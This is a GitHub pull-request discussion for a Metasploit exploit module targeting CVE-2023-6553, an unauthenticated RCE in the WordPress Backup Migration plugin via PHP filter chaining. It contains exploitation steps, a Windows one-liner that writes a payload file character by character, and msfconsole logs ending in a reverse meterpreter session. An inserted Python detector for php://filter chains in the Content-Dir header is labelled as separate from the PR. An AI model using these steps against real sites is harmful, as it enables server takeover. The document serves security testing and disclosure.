WordPress Backup Migration Plugin PHP Filter Chain RCE (CVE-2023-6553) #18633

Merged

Conversation

jheysel-r7

@jheysel-r7 jheysel-r7 commented Dec 20, 2023

This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint.

The vuln makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion. This allows an attacker to prepend a PHP payload to a string which gets evaluated by a require statement, which results in command execution.

Verification

List the steps needed to make sure this thing works

  • Follow the vulnerable target setup instructions outlined in the documentation file
  • Start msfconsole
  • Set the module options rhost, rport and lhost
  • Run, get a meterpreter session running in the context of the user running WordPress and have a happy holiday season.
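A defender-side check for the request pattern the module description names, added here as an example that is not part of this PR or of the Metasploit module: it parses a raw HTTP request, looks for the Content-Dir header on the backup-heart.php endpoint, and flags a value that carries a php://filter wrapper with chained convert.iconv stages, reporting how many stages were chained. The sample requests, the iconv encoding pairs in them and the function names are constructed for the example; a legitimate Content-Dir value is a filesystem path, so any php:// wrapper in it is anomalous regardless of the exact chain.

```python
import re
from typing import Dict, Optional, Tuple

# Endpoint and header named in the PR description (CVE-2023-6553, Backup Migration <= 1.3.7).
VULN_ENDPOINT = "/wp-content/plugins/backup-backup/includes/backup-heart.php"
FILTER_WRAPPER_RE = re.compile(r"php://filter/", re.IGNORECASE)
ICONV_STAGE_RE = re.compile(r"convert\.iconv\.", re.IGNORECASE)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into (method, path, headers); header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_request(raw: str) -> Optional[dict]:
    """Return a finding dict for a suspicious Content-Dir header on the vulnerable endpoint, else None."""
    _method, path, headers = parse_request(raw)
    if not path.startswith(VULN_ENDPOINT):
        return None
    content_dir = headers.get("content-dir")
    if content_dir is None:
        return None
    if not FILTER_WRAPPER_RE.search(content_dir):
        # A plain path is what the plugin expects here; nothing to report.
        return None
    stages = len(ICONV_STAGE_RE.findall(content_dir))
    return {
        "path": path,
        "header": "Content-Dir",
        "iconv_stages": stages,
        "reason": "php://filter wrapper in Content-Dir with %d chained convert.iconv stage(s)" % stages,
    }


# Constructed sample traffic (not captured from a real target).
BENIGN_REQUEST = "\r\n".join([
    "POST " + VULN_ENDPOINT + " HTTP/1.1",
    "Host: wordpress.example",
    "Content-Dir: /var/www/html/wp-content",
    "Content-Length: 0",
    "", "",
])

OTHER_PATH_REQUEST = "\r\n".join([
    "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1",
    "Host: wordpress.example",
    "Content-Dir: php://filter/convert.iconv.UTF8.UTF16/resource=x",
    "", "",
])

SUSPICIOUS_REQUEST = "\r\n".join([
    "POST " + VULN_ENDPOINT + " HTTP/1.1",
    "Host: wordpress.example",
    # Encoding pairs below are placeholders chosen for the example, not a working chain.
    "Content-Dir: php://filter/convert.iconv.UTF8.UTF16|convert.iconv.UTF16.UTF8"
    "|convert.iconv.UTF8.UTF7|convert.iconv.UTF7.UTF8|convert.base64-decode/resource=/tmp/x",
    "Content-Length: 0",
    "", "",
])


def scan(requests) -> list:
    """Run inspect_request over a list of raw requests and collect the findings."""
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


if __name__ == "__main__":
    for finding in scan([BENIGN_REQUEST, OTHER_PATH_REQUEST, SUSPICIOUS_REQUEST]):
        print(finding["reason"], "on", finding["path"])
```

The check keys on the wrapper rather than on the stage count, because the header is supposed to hold a directory path; the stage count is reported as a severity hint since the technique the PR describes relies on many chained conversions to build up the prepended bytes.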

@Chocapikk

Hi @jheysel-r7, I forgot to specify but the payload will only work for Linux. I think this should work for Windows but I haven't tested it:

<nul set /p="C">>file.php

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
@cdelafuente-r7 cdelafuente-r7 self-assigned this Jan 11, 2024
@jheysel-r7

Hi @jheysel-r7, I forgot to specify but the payload will only work for Linux. I think this should work for Windows but I haven't tested it:

<nul set /p="C">>file.php

Good catch @Chocapikk! I didn't realize that. Instead of implementing a separate Windows payload I went with a native PHP solution. The downside to this approach is that the payload is relatively much longer which means our temp payload filename has to be much shorter. I know we usually like our payloads to be around 8 random characters although in this scenario I don't think that's possible.

@cdelafuente-r7 let me know if you think it's reasonable to have a one character payload in this scenario.

@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks @jheysel-r7 for this module and this cool technique! I just left a few minor comments. I tested using the docker installation you provided and it works great.

@cdelafuente-r7

Thanks for updating this @jheysel-r7. It looks good to me now. However, I retested against the same Docker installation with the plugin backup-backup.1.3.7.zip installed and it doesn't work anymore. I checked the version before these changes (commit 6d8666e) and this one works fine. I'll send you the HTTP trace directly.

msf6 exploit(multi/http/wp_backup_migration_php_filter) > run verbose=true rhosts=127.0.0.1 rport=8000 lhost=192.168.144.1

[*] Started reverse TCP handler on 192.168.144.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.2
[*] Checking /wp-content/plugins/backup-backup/readme.txt
[*] Found version 1.3.7 in the plugin
[+] Detected Backup Migration Plugin version: 1.3.7
[+] The target appears to be vulnerable.
[*] Writing the payload to disk, character by character, please wait...
[!] The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.
[!] This exploit may require manual cleanup of 'R' on the target
[!] This exploit may require manual cleanup of 'BqUT.php' on the target
[*] Exploit completed, but no session was created.

@cdelafuente-r7

Thanks for updating this @jheysel-r7! Everything looks good to me now. I tested against a docker installation of WordPress 6.4.2 with backup-backup plugin version 1.3.7 and verified I got a session. I'll go ahead and land it.

  • Example output:
msf6 exploit(multi/http/wp_backup_migration_php_filter) > run verbose=true rhosts=127.0.0.1 rport=8000 lhost=192.168.100.101

[*] Started reverse TCP handler on 192.168.100.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.2
[*] Checking /wp-content/plugins/backup-backup/readme.txt
[*] Found version 1.3.7 in the plugin
[+] Detected Backup Migration Plugin version: 1.3.7
[+] The target appears to be vulnerable.
[*] Writing the payload to disk, character by character, please wait...
[*] Sending stage (39927 bytes) to 192.168.100.101
[+] Deleted z
[+] Deleted RjUF.php
[*] Meterpreter session 1 opened (192.168.100.101:4444 -> 192.168.100.101:62725) at 2024-01-17 18:25:14 +0100

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 27979d21cadf
OS          : Linux 27979d21cadf 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023 x86_64
Meterpreter : php/linux

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 17, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit b8aa55c into rapid7:master Jan 17, 2024
58 checks passed
@cdelafuente-r7

Release Notes

This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.
